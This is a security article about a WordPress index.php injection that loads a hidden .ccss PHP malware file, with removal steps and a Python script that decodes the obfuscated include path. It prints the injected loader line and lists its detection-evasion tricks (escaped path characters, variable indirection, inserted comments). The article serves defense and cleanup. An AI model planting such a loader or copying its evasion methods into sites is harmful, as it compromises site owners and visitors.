This article explains a new WordPress tampering technique: the inclusion of .ccss malware.

WordPress index.php tampering with .ccss includes

This malware modifies the index.php file and embeds the following code in it. Because index.php is executed whenever a WordPress page is loaded, the embedded code runs on every page load.

<?php
/*307a3*/

$r2r = "/home/*****/w\x70\x2dincludes/images/media/.36050178.ccss"; strpos($r2r, '97to'); @include_once /* 6ejs7 */ ($r2r);

/*307a3*/

A. This code uses several techniques to avoid malware detection.

B. Some characters of the path string are written as \x escape sequences (character codes) instead of literal characters.

C. The path is first put into a variable to make it harder to match the detection pattern.

D. A comment is placed after @include_once to prevent detection pattern matching.

The comment (/*307a3*/), a random string of characters placed above and below the include statement, is used to check whether the malware's tampering code remains.

The body of the malware is a file with the extension .ccss

The code embedded in index.php that contains this malicious @include statement is not the malware itself. The malware body is a file named with a random string plus the .ccss extension, which is loaded through the path given to the @include statement.

The .ccss extension is not one normally used for files placed on the Web, but the file's content is a PHP program like the one shown below, which is loaded and executed by the @include statement.

How do I get rid of this malware?

After detecting the malware with plugins or by visual inspection, you need to delete both the include statement and the .ccss file that is the malware itself. The .ccss file may be located in a very deep folder, and its location varies from site to site, so it may be difficult to manually check each folder one by one.

The path of the malware body loaded by the @include statement has some characters written as \x escape sequences, so it is hard to tell at a glance where the path points.
Such obfuscated programs can be deobfuscated here
It may be easier to deobfuscate the path and delete the malware body at that path.
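
The following is an added example, not code from the original article: a small Python check that finds an include wrapped in matching marker comments and decodes the \x escapes so the real path of the .ccss body can be read. The function names are hypothetical, and it assumes the path is assigned to a variable as a double-quoted string inside the marked block, as in the sample above.

```python
import re

# Matching marker comments, e.g. /*307a3*/ ... /*307a3*/, around the injected block.
MARKED_BLOCK = re.compile(r"/\*(\w{4,8})\*/(.*?)/\*\1\*/", re.S)
# $var = "double-quoted string";
ASSIGN = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
# [@]include/require[_once], optional comments, then ($var) or $var
INCLUDE = re.compile(
    r"@?\b(?:include|require)(?:_once)?\b(?:\s|/\*.*?\*/)*\(?\s*\$(\w+)", re.S)
# PHP double-quote escapes: \xHH (hex) and \NNN (octal)
ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def decode_php_escapes(s):
    """Decode \\xHH and octal escapes as PHP does inside double quotes."""
    def repl(m):
        code = int(m.group(1), 16) if m.group(1) else int(m.group(2), 8) & 0xFF
        return chr(code)
    return ESCAPE.sub(repl, s)


def find_injected_includes(php_source):
    """Return (marker, decoded_path) for each marker-wrapped variable include."""
    hits = []
    for block in MARKED_BLOCK.finditer(php_source):
        marker, body = block.group(1), block.group(2)
        strings = dict(ASSIGN.findall(body))  # variable name -> raw string
        for inc in INCLUDE.finditer(body):
            if inc.group(1) in strings:
                hits.append((marker, decode_php_escapes(strings[inc.group(1)])))
    return hits


# Sample: the injected block quoted in this article, followed by a constructed
# stand-in line for the legitimate index.php content.
SAMPLE = r'''<?php
/*307a3*/

$r2r = "/home/*****/w\x70\x2dincludes/images/media/.36050178.ccss"; strpos($r2r, '97to'); @include_once /* 6ejs7 */ ($r2r);

/*307a3*/

require __DIR__ . '/wp-blog-header.php';
'''

if __name__ == "__main__":
    for marker, path in find_injected_includes(SAMPLE):
        print(f"marker /*{marker}*/ includes {path}")
```

The decoded path is the file to inspect and delete together with the marked block; an index.php without such a block produces no hits.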

It is also possible that there are other backdoors, or that other sites on the server are infected.
We recommend that you use plugins to detect and remove malware from other sites on the server as well, and if this is unmanageable, we recommend that you contact a specialist.